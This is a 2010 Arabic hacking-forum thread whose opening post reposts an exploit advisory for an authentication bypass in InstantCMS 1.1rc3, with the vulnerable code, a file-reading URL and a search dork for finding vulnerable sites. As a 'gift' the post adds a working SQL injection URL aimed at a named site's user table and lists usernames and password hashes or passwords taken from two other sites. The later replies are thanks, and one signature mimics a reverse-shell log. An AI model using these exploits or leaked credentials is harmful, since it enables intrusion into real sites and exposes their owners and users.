التواصل المباشر مع الادارة والاعضاء القدامى من خلال قناة التلغرام


قديم 03-24-2010, 02:32 AM   رقم المشاركة : 1 (permalink)
معلومات العضو
 
الصورة الرمزية Zero
 

 

 
إحصائية العضو








Zero غير متواجد حالياً

إرسال رسالة عبر MSN إلى Zero

 

 

إحصائية الترشيح

عدد النقاط : 10
Zero is on a distinguished road

.......... ثغرة بتاريخ 24/03/2010 و مواقع و باسات هدية


بسم الله الرحمن الرحيم

الحمدلله والصلاة والسلام على رسول الله وعلى آله وصحبه أجمعين

السلام عليكم ورحمة الله وبركاته

اليوم وكل يوم مع الجديد تغرة بتاريخ 24/03/2010

بدون الاطالة اليكم بملف التغرة وقريبا اوافيكم بالشرح

كود PHP:
=======================================================
Instant CMS <= 1.1rc3 Admin (Auth BypassVulnerability
=======================================================


1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0                          
0     _                   __           __       __                     1
1   
/' \            __  /'__`\        /\ \__  /'__`\                   0
0  
/\_, \    ___   /\_\/\_\ \ \    ___\ \ ,_\/\ \/\ \  _ ___           1
1  
\/_/\ \ /' _ `\ \/\ \/_/_\_<_  /'___\ \ \/\ \ \ \ \/\`'__\          0
0     \ \ \/\ \/\ \ \ \ \/\ \ \ \/\ \__/\ \ \_\ \ \_\ \ \ \/           1
1      \ \_\ \_\ \_\_\ \ \ \____/\ \____\\ \__\\ \____/\ \_\           0
0       \/_/\/_/\/_/\ \_\ \/___/  \/____/ \/__/ \/___/  \/_/           1
1                  \ \____/ >> Exploit database separated by exploit   0
0                   \/___/          type (local, remote, DoS, etc.)    1
1                                                                      0
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-1

#[+] Discovered By   : Inj3ct0r
#[+] Site            : Inj3ct0r.com
#[+] Support e-mail  : submit[at]inj3ct0r.com
#[+] Visit : inj3ct0r.com , inj3ct0r.org , inj3ct0r.net


Site product: http://instantcms.ru/
Version: 1.1rc3


admin/index.php

Vulnerable code:

 //-------CHECK AUTHENTICATION-------------------------------------- 
    if (!isset(
$_SESSION['user'])) {  
        header('location:login.php');  
    } else {     
        if (!cmsUserIsAdmin(
$_SESSION['user']['id'])){             
            if (cmsUserIsEditor(
$_SESSION['user']['id'])){ 
                header('location:editor/index.php'); 
            } else { header('location:login.php'); } 
        } 
    } 
    //------------------------------------------------------------------ 


    
Admin panel have no password. And then you can watch and modify any files:

http://instantcms.ru/admin/index.php?view=editor&lang=php&file=/includes/config.inc.php

-----------------------------------

Google gives about 100 results found for :

intext: InstantCMS inurl: view-content/do-read


---------------------------------


# Inj3ct0r.com [2010-03-24] 

و هدية بسيطة مني

مواقع مصابة بتغرة سكل

ورابط استغلالها
--

كود PHP:
http://nal-extrim.ru/index.php?module=News&do=Category&id=-1+union+select+1,2,3,concat_ws%280x3a,user_name,user_password,user_email%29,5,6,7,8,9,10,11,12,13,14,15,16,17,18+from+kasseler_users-- 
كود PHP:
     http://www.arzuntarin.com

User3938907c39b5a1608651fc7980cd1031
Pass
1b5a6e98a37cfe03ed44f10ee34f08a2 

كود PHP:
    http://www.itmaasia.com

Ueradminq
Pass
7764b0f125801509661444a2fcdbe88c
Id
1

User
user2
Pass
1234
Id
2

User
zxg
Pass
111111 



eyvm fjhvdo 24L03L2010 , l,hru fhshj i]dm

   

رد مع اقتباس
قديم 03-24-2010, 02:46 AM   رقم المشاركة : 2 (permalink)
معلومات العضو
 
إحصائية العضو







synyster-hacker غير متواجد حالياً

إرسال رسالة عبر MSN إلى synyster-hacker إرسال رسالة عبر Skype إلى synyster-hacker

 

 

إحصائية الترشيح

عدد النقاط : 10
synyster-hacker is on a distinguished road

افتراضي


موفق بإذن الله ... لك مني أجمل تحية . موفق بإذن الله ... لك مني أجمل تحية . ألف مبروك .. لقد سعدت بهذا الخبر

التوقيع

Synyster-hacker is b@ck ^^
-----------------------------------------------------

http://www.faithofmuslims.com/blog/w...1/07/jihad.jpg

-----------------------------------------------------

http://static.tumblr.com/uicsyk3/f1y...l-rayajpg.jpeg
_____________________________________

 

   

رد مع اقتباس
قديم 03-24-2010, 03:27 AM   رقم المشاركة : 3 (permalink)
معلومات العضو
Hαcĸer'ѕ Kιɴɢ
:: Interactive Developer ::
 
الصورة الرمزية Hαcĸer'ѕ Kιɴɢ
 

 

 
إحصائية العضو








Hαcĸer'ѕ Kιɴɢ غير متواجد حالياً

إرسال رسالة عبر MSN إلى Hαcĸer'ѕ Kιɴɢ

 

 

إحصائية الترشيح

عدد النقاط : 10
Hαcĸer'ѕ Kιɴɢ is on a distinguished road

افتراضي


شـكــ وبارك الله فيك ـــرا لك ... لك مني أجمل تحية .

التوقيع

** إن مرت الايام ولم تروني فهذه مشاركاتي فـتذكروني

وان غبت ولم تجدوني اكون وقتها بحاجه للدعاء فادعولي **

 

   

رد مع اقتباس
قديم 03-24-2010, 04:19 AM   رقم المشاركة : 4 (permalink)
معلومات العضو
 
الصورة الرمزية Dr.NaNo
 

 

 
إحصائية العضو







Dr.NaNo غير متواجد حالياً

 

 

إحصائية الترشيح

عدد النقاط : 10
Dr.NaNo is on a distinguished road

افتراضي


مشكور على الثغرة


تحياتي لك

التوقيع

http://www.vbspiders.com/vb/t61978.html

 

   

رد مع اقتباس
قديم 03-24-2010, 04:49 AM   رقم المشاركة : 5 (permalink)
معلومات العضو
 
الصورة الرمزية Zero
 

 

 
إحصائية العضو








Zero غير متواجد حالياً

إرسال رسالة عبر MSN إلى Zero

 

 

إحصائية الترشيح

عدد النقاط : 10
Zero is on a distinguished road

افتراضي


مشكورين على الردود

   

رد مع اقتباس
قديم 03-24-2010, 07:44 PM   رقم المشاركة : 6 (permalink)
معلومات العضو
 
الصورة الرمزية Dj-ArfisS
 

 

 
إحصائية العضو






Dj-ArfisS غير متواجد حالياً

 

 

إحصائية الترشيح

عدد النقاط : 10
Dj-ArfisS is on a distinguished road

افتراضي


شـكــ وبارك الله فيك ـــرا لك ... لك مني أجمل تحية .

التوقيع

Om3Ga-R!F
Email: Dj-ArfisS[at]9.cn
Om3Ga-Rif@hacker.ps

 

   

رد مع اقتباس
قديم 03-24-2010, 10:05 PM   رقم المشاركة : 7 (permalink)
معلومات العضو
 
الصورة الرمزية Tr0j4n
 

 

 
إحصائية العضو






Tr0j4n غير متواجد حالياً

إرسال رسالة عبر ICQ إلى Tr0j4n إرسال رسالة عبر AIM إلى Tr0j4n إرسال رسالة عبر MSN إلى Tr0j4n إرسال رسالة عبر Skype إلى Tr0j4n

 

 

إحصائية الترشيح

عدد النقاط : 10
Tr0j4n is on a distinguished road

افتراضي


شـكــ وبارك الله فيك ـــرا لك ... لك مني أجمل تحية .

التوقيع








 

   

رد مع اقتباس
قديم 03-24-2010, 11:54 PM   رقم المشاركة : 8 (permalink)
معلومات العضو
 
إحصائية العضو






MATRIX ALGERIA غير متواجد حالياً

إرسال رسالة عبر Skype إلى MATRIX ALGERIA

 

 

إحصائية الترشيح

عدد النقاط : 10
MATRIX ALGERIA is on a distinguished road

افتراضي


شـكــ وبارك الله فيك ـــرا لك ... لك مني أجمل تحية .

التوقيع

http://www.monsterup.com/upload/1216230399.gif
http://www.photoanon.com/images/r7pp...ktybcm60e2.jpg
THE MATRIX ALGERIA

[rainbow]حصريا..دورة تعلم واتقان لغة البرجمة C++[/rainbow]

موقع النبي صلى الله عليه وسلم

امحي ذنوبك في دقيقتين
http://www.shbab1.com/2minutes.htm
تحيا الجزائر حتى الموت
الجزائر مع فلسطين ظالمة او مظلومة
http://www.monsterup.com/upload/1216230399.gif

 

   

رد مع اقتباس
قديم 03-28-2010, 01:27 AM   رقم المشاركة : 9 (permalink)
معلومات العضو
El3ctr0-Dz
.:IronMind:.
 
الصورة الرمزية El3ctr0-Dz
 

 

 
إحصائية العضو








El3ctr0-Dz غير متواجد حالياً

إرسال رسالة عبر MSN إلى El3ctr0-Dz إرسال رسالة عبر Skype إلى El3ctr0-Dz

 

 

إحصائية الترشيح

عدد النقاط : 10
El3ctr0-Dz is on a distinguished road

افتراضي


شـكــ وبارك الله فيك ـــرا لك ... لك مني أجمل تحية .
بارك الهل فيك

التوقيع

======================================
[+] Human Error Detected : Auto payload in progress
[+] Generating payload
[+] Sending evil packet
[+] Reverse shell initiated from 68.82.4.9
[+] id=0(root) gid=0(root) groups=0(root)
======================================
P4L 4 Ev3r

qib@hotmail.com

 

   

رد مع اقتباس
قديم 03-28-2010, 01:27 AM   رقم المشاركة : 10 (permalink)
معلومات العضو
El3ctr0-Dz
.:IronMind:.
 
الصورة الرمزية El3ctr0-Dz
 

 

 
إحصائية العضو








El3ctr0-Dz غير متواجد حالياً

إرسال رسالة عبر MSN إلى El3ctr0-Dz إرسال رسالة عبر Skype إلى El3ctr0-Dz

 

 

إحصائية الترشيح

عدد النقاط : 10
El3ctr0-Dz is on a distinguished road

افتراضي


شـكــ وبارك الله فيك ـــرا لك ... لك مني أجمل تحية .
بارك الله فيك

التوقيع

======================================
[+] Human Error Detected : Auto payload in progress
[+] Generating payload
[+] Sending evil packet
[+] Reverse shell initiated from 68.82.4.9
[+] id=0(root) gid=0(root) groups=0(root)
======================================
P4L 4 Ev3r

qib@hotmail.com

 

   

رد مع اقتباس
إضافة رد

مواقع النشر (المفضلة)

أدوات الموضوع
انواع عرض الموضوع

تعليمات المشاركة
لا تستطيع إضافة مواضيع جديدة
لا تستطيع الرد على المواضيع
لا تستطيع إرفاق ملفات
لا تستطيع تعديل مشاركاتك

BB code is متاحة
كود [IMG] متاحة
كود HTML معطلة
Trackbacks are متاحة
Pingbacks are متاحة
Refbacks are متاحة

الانتقال السريع

المواضيع المتشابهه
الموضوع كاتب الموضوع المنتدى مشاركات آخر مشاركة
ثغرة كوكيز بتاريخ اليوم 28/07/2010 (AV Arcade v3 ****** Authentication Bypass) alaacol قـسـم إخـتـراق الـمـواقـع والـسـيرفـرات 3 03-22-2015 01:58 PM
ثغرة جديدة من فرن فولكانو بتاريخ اليوم Black-FoG قـسـم إخـتـراق الـمـواقـع والـسـيرفـرات 18 01-01-2015 02:40 AM
[ثغرة]~> بتاريخ 17/5/2010 (بتاريخ اليوم) SQL ++ مواقع محقونة .. الحق Jaguar.PS SQL قواعد البيانات 4 06-09-2010 02:56 AM
اكبر مكتبة مواقع و باسات (متجددة) Zero Hackers Showoff 13 05-14-2010 03:42 AM


الساعة الآن 04:31 AM


[ vBspiders.Com Network ]

SEO by vBSEO 3.6.0